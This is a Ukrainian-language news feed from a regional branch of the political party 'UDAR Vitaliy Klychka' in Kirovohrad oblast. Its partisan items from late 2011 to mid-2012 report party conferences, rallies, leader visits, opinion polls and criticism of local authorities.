«УДАР» єдина сила в якій представлені всі області.  «УДАР» - це саме так сила, яка об’єднує Україну. 

Сьогодні на розгляд сесії Кіровоградської обласної Ради було винесене питання про передачу Водоканалу «Дніпро Кіровоград» у приватну власність.

21 липня в Кіровограді відбулась Конференція Кіровоградської обласної організації. 

З власник джерел пресс-служба Кіровоградської обласної організації політичної партії «УДАР Віталія Кличка» отримала інформацію про ряд перевірок, які здійснює Управління Держтехногенбезпеки.

Нещодавно Асоціацією Політичних Наук було оприлюднено соціологічне опитування по 103 виборчому округу. Олександрійський округ завжди був форпостом Партії Регіонів. В 2004 році лише в Олександрії Віктор Янукович зміг здобути перемогу та й усі подальші роки тут вигравали виключно синьо-білі.

14 липня 2012 року відбулась конференція Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка».

У відповідності з пунктом 12 статті 3 Статуту Політичної партії «УДАР Віталія Кличка» за порушення цього ж Статуту Рада обласної організації прийняла рішення: виключити з лав партії Макієнка Олександра Івановича та Шмідта Віктора Федоровича, також призначила дату позачергової звітно-виборчої конференції міської організації Політичної партії «УДАР Віталія Кличка».

Уже декілька років у Литві діє досить цікаве місце відпочинку – так званий «Парк радянського періоду», де під відкритим небом зібрано пам’ятники минулої епохи, знесені за період незалежності країни. Не секрет, що такі проекти намагалися реалізувати й в Україні (мало того, навіть у нас, у Кіровограді, була спроба зробити подібний парк на проспекті Енергетиків, екс-Комуністичному). Але нашому місту таке культурне ноу-хау просто не треба. Достатньо зайти в деякі з відділень «Ощадбанку», аби отримати дозу радянщини періоду застою.

4 липня об 11-00 на центральній площі Кіровограда відбувся мітинг, проти нелегітимно прийнятого Верховною Радою закону «Про засади державної мовної політики».

Завтра на всіх українців чекає знаменна дата – річниця ухвалення основного Закону нашої держави. Цей день мав би стати одним з найбільших свят в Україні. Та в нашій державі все не так, як потрібно. Конституцію ніхто не виконує і тому річниця її ухвалення не є святом.
27 Червня 2012 +Коментар | подобається

20 червня представників усіх політичних сил до себе на гостину запросив губернатор Кіровоградщини Сергій Ларін. Головною метою зборів, мало стати підписання меморандуму «Про чесні вибори». Воно б може так і було, якби представники опозиційних партій області не проігнорували запрошення губернатора.
22 Червня 2012 +Коментар | подобається

Минулого року всі українські ЗМІ говорили про нашестя гусені на Кіровоград. На той момент влада просто не знала як, чим і навіщо боротись з цією заразою. Але все ж пообіцяла, що 2012 року така ситуація не повториться.
19 Червня 2012 +Коментар | подобається

«УДАР Віталія Кличка» на Кіровоградщині за останніми соціологічними дослідженнями вийшов на друге місце за симпатіями громадян.
14 Червня 2012 +Коментар | подобається

12 червня 2012 року у смт. Вільшанка Кіровоградської області відбулась зустріч з можливим кандидатом по 100-му мажоритарному виборчому окрузі від об’єднаної опозиції народним депутатом від партії ВО «Батьківщина» Еліною Шишкіною.
14 Червня 2012 +Коментар | подобається

Кіровоград – місто в центрі України, але коли випадає необхідність дістатись з нього до столиці, складається враження, що воно ледь не на Північному Полюсі.
13 Червня 2012 +Коментар | подобається

12 червня 2012 року на площі Кірова в Кіровограді відбулася акція патріотичних сил. Опозиційні партії Кіровоградщини висловили протест проти законопроекту Колісніченка-Ківалова.
13 Червня 2012 +Коментар | подобається

А от результати «УДАРу» продовжують зростати. Наразі ми вийшли на друге місце за симпатіями виборців у всіх округах Кіровоградщини. Якщо порівняти попередні результати дослідження цієї ж структури, то по області наш рейтинг піднявся на 3,78% і становить 15,48%. Партія Віталія Кличка на 4,5% випереджає партію влади і менше ніж на 3% відстає від «об’єднаної опозиції».
12 Червня 2012 +Коментар | подобається

В травні 2012 року завершилось створення районних організацій політичної партії «УДАР Віталія Кличка» на Кіровоградщині.
12 Червня 2012 +Коментар | подобається

20 травня 2012 року церква московського патріархату освячувала закопаний хрест на території середньої школи в селі Торговиці Новоархангельського району, що на Кіровоградщині. Церковні ділки давно мали намір побудувати на цьому місці церкву. І вже навіть отримали рішення сільської ради на виділення земельної ділянки, що правда таємно від громади селища.

Нещодавно по всій країні відгриміли випускні.  Колишні школярі виходять у вільне плавання і зайві кошти нікому не завадять. От за таку ідею і взялась команда ймовірного кандидата від Партії Регіонів по 101 мажоритарному округу – Віталія Грушевського.

Не секрет, що прогулянка вулицями нашого міста в темний час доби, а особливо у віддалених від центральної частини районах, досить часто перетворюється на такий собі «квест» з подоланнями «особливо небезпечних зон».

Приблизно місяць тому до керівництва партії «УДАР» звернулися працівники Кіровоградського кібернетико-технічного.коледжу з проханням про допомогу. Працівники розповіли нам, що в них забрали фінансування, і що вони сидять без зарплат. Партійці не залишились байдужими і відразу взялись за дослідження цього питання.

29 травня 2012 року у Знам’янку з візитом завітав Герой України, чемпіон світу з боксу, лідер політичної партії «УДАР» Віталій Кличко.
31 Травня 2012 +Коментар | подобається

29 травня 2012 року Світловодськ з візитом відвідав Герой України, чемпіон світу з боксу, лідер політичної партії «УДАР» Віталій Кличко.
30 Травня 2012 +Коментар | подобається

29 травня 2012 року до Олександрії з візитом завітав Герой України, чемпіон світу з боксу, лідер політичної партії «УДАР» Віталій Кличко.
29 Травня 2012 +Коментар | подобається

28 травня 2012 року місто Кіровоград з візитом відвідав Герой України, чемпіон світу з боксу, лідер політичної партії «УДАР» Віталій Кличко.
28 Травня 2012 +Коментар | подобається

24 травня, в Кіровоградському прес-клубі відбулась прес-конференція голови Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» Анатолія Ревенка.
24 Травня 2012 +Коментар | подобається

13 травня в місті Світловодську відбувся чемпіонат області з китайського боксу. Змагання відбулись під патронатом Світловодських міської та районної організацій політичної партії «УДАР Віталія Кличка».
23 Травня 2012 +Коментар | подобається

З 18 по 21 травня в селищі Нагорне Світловодського району відбулися щорічні Всеукраїнські табірно-польові збори «Центральний щит – 2012». 
23 Травня 2012 +Коментар | подобається

Останнім часом в Кіровоградських ЗМІ поширилась інформація про бажання однієї з релігійних громад міста побудувати свій новий храм і про протести жителів мікрорайону, в якому планується зведення церкви.
17 Травня 2012 +Коментар | подобається

13 травня у світі відзначалося найтепліше свято – День матері. Це свято для кожної людини. Мама – найближчий друг, соратник, порадник. Вона дарує тепло і вкладає душу в свою дитину.
14 Травня 2012 +Коментар | подобається

13 травня, в неділю, у Кіровограді відбудеться флеш-моб на підтримку Ганни Жабо.
11 Травня 2012 +Коментар | подобається

7 травня відбулось розширене засідання Ради Кіровоградської обласної організації партії «УДАР Віталія Кличка». Таке термінове скликання пов’язане з приїздом на Кіровоградщину лідера партії.

4 травня 2012 року члени Кіровоградської міської організації партії «УДАР Віталія Кличка» привітали ветеранів селища Нове зі святом Перемоги.

1-го травня 2012 року, у Кіровограді відбулася демонстрація до Дня солідарності трудящих. В заході взяли участь представники політичних сил, працівники підприємств та установ міста, городяни, які спекотного весняного дня вийшли на центральну вулицю.

20-22 квітня 2012 року у місті Харків відбувся Чемпіонат Світу з військово-спортивного багатоборства. 
24 Квітеня 2012 +Коментар | подобається

Сьогодні, 4 травня 2012 року, об 11 годині, за адресою вул.Чорновола 2в, відбулася прес-конференція Анатолія Ревенка. На прес-конференції були оголошені рішення 9-го З’їзду Партії «УДАР Віталія Кличка».

    Нещодавно у ЗМІ вийшла стаття Анатолія Ревенка «Ще раз про корупцію на периферії». В цій статті, голова Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» ще раз зробив наголос на тотальній проблемі корупції, яка проросла у всі сфери.  
26 Квітеня 2012 +Коментар | подобається

24 квітня 2012 року, під стінами Кіровоградської міської ради відбулося пікетування, організоване працівниками Кібернетико-технічного коледжу та активістами партії «УДАР Віталія Кличка». Причиною, яка вивела освітян на вулицю, стала систематична затримка виплати заробітної плати
24 Квітеня 2012 +Коментар | подобається

Центрально-українська соціологічна лабораторія оприлюднила нові передвиборчі рейтинги політичних партій. Наразі партія «УДАР Віталія Кличка» посідає третє місце в опитуванні з результатом 8,7%. Всього на 5% попереду йде «Батьківщина», а на першому місці партія Регіонів з результатом – 19,9%.
16 Квітеня 2012 +Коментар | подобається

Ще в 90-х роках минулого століття у Знам’янці розпочалося будівництво нової великої школи. Але як часто бувало в ті часи – школу недобудували, залишивши бовваніти в місті саму лише цегляну коробку. Згодом вона поросла деревами, кущами, стала притулком для вуличних собак та безхатченків.
23 Квітеня 2012 +Коментар | подобається

Сьогодні у нас у державі іде тотальна боротьба із корупцією на всіх рівнях. Президент видає укази, Верховна Рада ухвалює закони, уряд приймає постанови, а на місцях керівники областей і районів практично втілюють їх у життя. Корупції нема вже куди подітися – так її обклали з усіх сторін. У нас у Кіровоградській області голова  облдержадміністрації пригрозив позашивати кишені всім чиновникам, якщо вони братимуть хабарі. 
20 Квітеня 2012 +Коментар | подобається

Вчора, в різних засобах масової інформації виплила новина, що виконкомом Кіровоградської міської ради було скасовано маршрут №50.
19 Квітеня 2012 +Коментар | подобається

  18 квітня 2012 року відбулась Конференція кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка». Головним питанням порядку денного було обрання  делегатів на 9 З’їзд партії, що відбудеться 28 квітня у місті Запоріжжі. Відкриваючи Конференцію голова обласної організації Анатолій Ревенко заявив, що «УДАР» відійшов від практики проведення своїх з’їздів у Києві, а поширює такі важливі заходи у регіони.  
19 Квітеня 2012 +Коментар | подобається

Житлово-комунальне господарство Кіровоградської територіальної громади знаходиться у край тяжкому стані. З одного боку невдоволення мешканців по обслуговуванню житла (особливо по виконанню ремонтних робіт житлового фонду), з іншого неможливість виконувати необхідний об’єм ремонтних робіт (застарілий житловий фонд та відсутність коштів внаслідок невідповідності тарифів) і так далі. Нема потреби в переліченні всіх недоліків в системі ЖКГ – головне висновки.
14 Квітеня 2012 +Коментар | подобається

Нещодавно стало відомо, що з обласного бюджету буде виділено 200 тисяч гривен на висвітлення «підвищення стандартів життя».
8 Квітеня 2012 +Коментар | подобається

  9 квітня 2012 року у Кіровоград, презентувати свою нову книгу, приїхав знаний українофоб Володимир Корнілов. Його книга носить трагічну назву «Донецько-Криворізька республіка. Розстріляна мрія» - але ж звичайно російською, бо українською мовою, товаришу Корнілову писати чи то складно, чи то не приємно…  
9 Квітеня 2012 +Коментар | подобається

Партія «УДАР» розпочала інтеграцію в Європейську народну партію. Віталій Кличко представив свою партію та її програму у Брюсселі на з’їзді ЄНП. На цьому заході «УДАР» було репрезентовано, як партію європейського зразка. Лідер партії УДАР Віталій Кличко звернувся до керівництва Європейської народної партії з проханням щодо надання партії УДАР статусу спостерігача в цій організації.
6 Квітеня 2012 +Коментар | подобається

Партія «УДАР Віталія Кличка» піде на вибори до Верховної Ради окремо від інших опозиційних сил. Таке рішення є результатом довгих дискусій, обговорень та вивчення результатів соціологічних опитувань.
5 Квітеня 2012 +Коментар | подобається

29 березня у місті Світловодськ мала відбутись сесія міської ради. На ній мали призначити нових заступників міського голови. Але їх обрав не сам голова і навіть не депутатський корпус. А хто б ви думали? Так, це мали б бути люди губернатора Кіровоградщини Сергія Ларіна. Він мотивував це тим, що саме його люди змогли б покращити ситуацію в місті і приступити до виконання його ж програми «Центральний регіон».
29 Березеня 2012 +Коментар | подобається

Сьогодні, 25 березня 2012 року, о 12 годині відбувся мітинг патріотичних сил присвячений, вшануванню пам’яті великого Українця В’ячеслава Максимовича Чорновола. Саме в цей день, 13років тому, пан Чорновіл прибув у Кіровоград, де і провів останній день свого земного життя. А повертаючись до Києва, вночі, він потрапив у безглузду і невипадкову автокатастрофу, яка обірвала його життя.
25 Березеня 2012 +Коментар | подобається

25 березня 2012 року, о 12 годині відбудеться вшанування пам’яті Великого сина України, борця за її незалежність В’ячеслава Максимовича Чорновола.
23 Березеня 2012 +Коментар | подобається

20 березня 2012 року, у Кіровограді відбулись 9-ті збори еліти Кіровоградської області. У заході брали участь представники інтелігенції, влади, духовенства, бізнесмени, меценати і політики.
20 Березеня 2012 +Коментар | подобається

Сьогодні, 20 березня 2012 року, о 16 годині, в приміщенні Будинку Профспілок відбудуться 9-ті Збори еліти Кіровоградської області.
20 Березеня 2012 +Коментар | подобається

В Кіровограді відбулась позачергова звітно-виборча конференція міської організації політичної партії «УДАР Віталія Кличка». Рішення про проведення конференції було прийнято Радою обласної організації.
18 Березеня 2012 +Коментар | подобається

Як стало відомо, у понеділок, 19 березня 2012 року, має відбутись позачергове засідання Кіровоградської топонімічної комісії. Дивує терміновість та спонтанність цього рішення, оскільки на нашу думку питання перейменування не є нагальним і не відповідає викликам сьогодення.
16 Березеня 2012 +Коментар | подобається

Нещодавно кіровоградців  здивували. Ні для кого не секрет, що Кіровоградщину природа щиро наділила покладами інертного газу радону. Ні для кого, окрім обласної державної адміністрації. Можновладці чи то забули про цей загальновідомий факт, чи то просто вирішили і на цьому балів на майбутні вибори заробити.
16 Березеня 2012 +Коментар | подобається

ВО “Батьківщина” знову випередила Партію регіонів, повідомляє КОО \\\"Асоціація Політичних Наук\\\". У партії Тимошенко 18,8 %, а у Фронту змін – 12,36 %. Далі іде ПР – 11,61% , на четверте місце виходить УДАР - 6,8 %; далі – ВО «Свобода», яка обійшла КПУ. У неї - 4,3%.
14 Березеня 2012 +Коментар | подобається

Весна тільки вступає в свої права, неквапливо відбираючи у зими кожен день. А у Кіровоградської обласної організації партії «УДАР Віталія Кличка» кипить справжня весняна робота. Вона продовжує створювати осередки у районах області.
14 Березеня 2012 +Коментар | подобається

  9 березня 2012 року, о 12 годині у Кіровограді відбувся мітинг опозиційних сил, присвячений 198-річниці від Дня Народження великого українця Тараса Шевченка.  
9 Березеня 2012 +Коментар | подобається

Віталій Кличко привітав усіх жінок зі святом весни
7 Березеня 2012 +Коментар | подобається

6 березня на площі Кірова кіровоградська молодь провела перфоменс «Покажи червону картку Януковичу» на підтримку Всеукраїнській ініціативі «Вставай!».
6 Березеня 2012 +Коментар | подобається

  Вже вдруге Інститут Політичної Освіти зібрав жінок-депутатів з різних куточків України. Зустріч відбулась в місті Буча (Київська область) на базі навчального комплексу «Зелена Буча». Метою заходу було підвищення ефективності роботи жінки-політика в місцевому самоврядуванні.  
6 Березеня 2012 +Коментар | подобається

  5 березня 2012 року о 12 годині відбулась прес-конференція голови Кіровоградської обласної організації політичної партії «УДАР Віталія Кличка» Анатолія Дмитровича Ревенка. Прес-конференція була присвячена другим роковинам перебування при владі президента Януковича і прем’єр-міністра Азарова. Анатолій Дмитрович розпочав свою промову з того, що влада – це не лише посади і привілеї, а у першу чергу – це колосальна відповідальність. І кожен політик, що перебуває при владі, повинен відповідати за свої обіцянки і дії перед виборцями.  
5 Березеня 2012 +Коментар | подобається

6 березня 2012 року, о 14 годині на Площі Кірова відбудеться перфоменс «Покажи червону картку Януковичу» на підтримку Всеукраїнської молодіжної ініціативи «Всатавай».
5 Березеня 2012 +Коментар | подобається

  У понеділок, 5 березня 2012 року о 12 годині, в приміщенні офісу Кіровоградської обласної організації політичної партії «УДАР Віталія Кличка» за адресою вул. Чорновола 2В (біля ринку „Океан” навпроти готелю „Рейкарц”) відбудеться прес-конференція голови організації Анатолія Ревенка на тему других роковин владарювання в Україні Януковича і Азарова.  
2 Березеня 2012 +Коментар | подобається

Минулими вихідними Олександрія перетворилась на Венецію, адже прийшла весна і почав танути сніг. І саме на такий вологий день у місті була запланована пробіжка «За здоровий спосіб життя», організатором якої виступила Олександрійська міська організація політичної партії «УДАР Віталія Кличка». Організатори вже подумки змирились з тим, що людей буде дуже мало і можливо доведеться відмінити захід. Але, яким було їх здивування, коли на площі Кірова зібралось море людей, яких не злякала погода.
29 Лютого 2012 +Коментар | подобається

  Ні для кого не секрет, що нинішня влада всіляко виділяє і підтримує московський патріархат. Саме для них виділяються землі під все нові і нові храми, знаходяться мільйони гривень у бюджеті на їх потреби, віддаються музеї і дитячі будинки. А нещодавно, ділки від церкви дісталися Кіровоградщини.   
24 Лютого 2012 +Коментар | подобається

  Про що сьогодні може прочитати в ЗМІ пересічний Кіровоградець? Про досягнення Губернатора, про його програму «Центральний регіон», про його молоду команду, про те, як нагально потрібно змінювати назву міста – одним словом дифірамби керівництву області. А от проблема слабкої жінки нікому не цікава, це ж не впливає на рейтинг влади. Тому і не має журналістів і просто бажаючих допомогти, висвітлити цю проблему, розібратися і просто підтримати.  
24 Лютого 2012 +Коментар | подобається

Сьогодні, 22 лютого 2012 року, відбулося пленарне засідання чотирнадцятої сесії Ленінської районної в місті Кіровограді ради. В ході роботи, керівництвом Ради було допущено ряд кричущих порушень норм регламенту.
22 Лютого 2012 +Коментар | подобається

Привітання з 23 лютого від Анатолія Ревенка
23 Лютого 2012 +Коментар | подобається

Привітання з Днем захисника вітчизни від Віталія Кличка.
23 Лютого 2012 +Коментар | подобається

Минулого Різдва, замість свята, до господи кіровоградки Ганни Жабо увірвалося страшне горе. Саме в цей святковий день вона в останнє бачила свого дворічного синочка. За словами постраждалої, до неї прийшла колишня свекруха і попросила погуляти кілька годин з дитиною, Ганна дозволила…Як би ж то вона знала, що дитину вона побачить вже не скоро.
17 Лютого 2012 +Коментар | подобається

У Світловодську створено міську і районну організації політичної партії «УДАР (український Демократичний Альянс за Реформи) Віталія Кличка» 
17 Лютого 2012 +Коментар | подобається

15 лютого 2012 року у Кіровограді розпочав свою діяльність клуб інтелектуально-психологічних ігор «Підпілля». Правила гри розроблені на основі відомої та популярної гри «Мафія», але більше адаптовані до реалій української політики та останніх подій у державі.
16 Лютого 2012 +Коментар | подобається

Цьогорічна зима здивувала українців двічі – весняною і теплою першою половиною, а от тепер, лютими морозами. Температура спустилась до рекордно низьких показників, прочекати 10 хвилин маршрутку видається справжнім подвигом.
12 Лютого 2012 +Коментар | подобається

  6 лютого 2012 року, у Новоархангельську відбулася зустріч власників земельних паїв з представниками влади. Цікаво, що влада не полінувалася обдзвонити кожного!, і особисто запросити на зустріч, пообіцявши, що мова торкатиметься найболючіших питань для селян.    
11 Лютого 2012 +Коментар | подобається

Останнім часом до Кіровоградської обласної організації партії «УДАР» почастішали звернення підприємців на непомірно високі орендні ставки для їх підприємств, через які вони вимушені або закриватись, або підвищувати ціни на свою продукцію. Ми вирішили вивчити це питання і знайшли ось що…

На апаратній нараді в Обласній державній адміністрації, що відбулась 7-го лютого, Сергій Ларін знову здивував усіх присутніх своїм рішенням. У вступній промові він розповів присутнім, що мав розмову з головним лікарем Обласної лікарні Миколою Шевчуком і запропонував йому написати заяву «за власним бажанням». Пояснив своє рішення «губернатор всея…» тим, що в лікарні вимагають благодійні внески, що там недостатня база і, що найголовніше, президента зустріли не так, як годиться.

На нещодавно проведеній нараді з підготовки до весняно-польових робіт, заступник міністра з аграрної політики Микола Безуглий заявив, що на Кіровоградщині доведеться пересівати 150тис.га озимини. Як зазначив Микола Безуглий, у зв’язку зі складними погодними умовами, які призвели до недостатньої зволоженості посівних площ, загинула значна частина озимини. Також перший заступник міністра відмітив, що аграрії області дуже погано забезпечені якісними добривами, засобами для захисту рослин та насінням. 

На початку грудня відбулась перша прес-конференція Анатолія Ревенка, як голови обласного осередку партії Віталія Кличка«Удар».Він розповів журналістам про те, що на Кіровоградщині будуватиметься така партійна організація, яка буде конкурентною на майбутніх парламентських виборах. І  піддав критиці започатковану губернатором акцію «Купуй Кіровоградське». Назвавши її порушенням антимонопольного законодавства.  

  Як вже повідомляв «весь Кіровоград» сьогодні відбулась прес-конференція Анатолія Ревенка, який очолив обласний осередок партії Віталія Кличка «Удар».    

Нагородженням переможців завершився Міжнародний конкурс письмових творчих робіт «Україна моєї мрії», який тривав з 16 липня по 1 листопада і зібрав 581 роботу з усіх куточків України, а також з Італії та Естонії.

Напередодні Нового 2012 року влада Кіровоградщини підготувала не дуже приємний сюрприз для прихильників театрального мистецтва. Без будь-яких на те причин та без дотримання чітко визначеної законом процедури, було змінено директора Кіровоградського Академічного театру ім.Кропивницького. 

29 січня 2012 року о 12.45 у Кіровограді відбудеться акція до Дня Героїв Крут. Акція пройде у вигляді ходи від монументу «Янгол Охоронець» до пам’ятника Богданові Хмельницькому, з проведенням мітингу-реквієму біля останнього. Місцем збору усіх бажаючих взяти участь в заходах було обрано площу довкола «Янгола Охоронця» (вул.Велика Перспективна).Ініціатором акції виступила Кіровоградська обласна організація Політичної Партії «УДАР Віталія Кличка»

22 січня 2012 року о 13 годині у Кіровограді відбудеться акція до Дня Соборності України. Місцем проведення акції було обрано центральний міст через річку Інгул (вул..Велика Перспективна), береги якої буде об’єднано в живий ланцюг Єдності. Співорганізаторами акції виступили Кіровоградська обласна організація Політичної Партії «УДАР Віталія Кличка» та ГО «КВІС»

Сьогодні відбулась прес-конференція Анатолія Ревенка, який очолює обласний осередок партії Віталія Кличка «Удар». Зокрема, він розповів про те, що на Кіровоградщині створюватиметься така партійна організація, яка готуватиметься до майбутніх парламентських виборів

В Кіровоградській обласній організації «УДАРу Віталія Кличка» робота не припинялась навіть під час новорічних свят.

«Спроби силовиків спіймати і покарати народних месників не спинять українців. Повагу можна заслужити лише справжньою турботою про народ». Так Анатолій Ревенко, голова Кіровоградської обласної організації партії «УДАР Віталія Кличка», прокоментував на прохання ЗМІ інформацію, що в Олександрії невідомі закидали фарбою білборди із портретами президента України Віктора Януковича та міського голови, представника ПР Степана Цапюка.

Кабінет міністрів України 11 січня видав розпорядженні № 5-р,відповідно до якого ліквідовується державне підприємство «Бурвугілля», яке було створене Міністерством вугільної промисловості у 2007 році на базі частини активів державної холдингової компанії «Олександріявугілля».

В середині січня на Кіровоградщині було створено ще три осередки Політичної Партії \\\"УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка\\\"

Нещодавно змінилося керівництво Кіровоградського академічного музично-драматичного театру ім.М. Кропивницького, замість Михайла Ілляшенка виконувати обов’язки керівника призначили Ігора Спінула, керівника народного ансамблю бального танцю «Конвалія».

Кіровоградська обласна організація політичної партії «УДАР Віталія Кличка» з кожним днем набирає ваги, залучаючи все нових і нових прихильників.  
30 Грудня 2011 +Коментар | подобається

22 січня 2012 року у Кіровограді відбулася акція до Дня Соборності України. Представники різних політичних сил і громадських організацій, взявшись за руки, утворили Ланцюг Злуки, з’єднавши лівий та правий береги Інгулу. У акції взяли участь понад 300 чоловік.

20 січня 2012 року у приміщенні Кіровоградського прес-клубу Реформ відбулася прес-конференція лідера Кіровоградської обласної організації Політичної Партії «УДАР Віталія Кличка» Анатолія Ревенка.

28 січня 2012 року у місті Знам\'янка, що у Кіровоградській області, відбувся чемпіонат області з античного бойового мистецтва – панкратіону.

29 січня 2012року у Кіровограді відбулось вшанування Героїв-крутянців. У акції взяли участь патріотичні політичні партії ( «УДАР Віталія Кличка», ВО «Свобода», Народний Рух України, Конгрес Українських Націоналістів), а також ряд громадських організацій ( «КВІС», Українська Студентська Спілка, Січ, Українське Козацтво, Спілка Ветеранів України, Національний Альянс) і священнослужителі УПЦ (КП) та УГКЦ.

31 січня 2012 року на Кіровоградщину з візитом завітав САМ Віктор Янукович. Основною метою візиту (чи то б пак офіційною) стало відкриття Кіровоградського Обласного перинатального центру. Він бо ж, цей центр, перший з цілого проекту, який придумав і втілює в життя президент «Нове життя - нова якість охорони материнства та дитинства».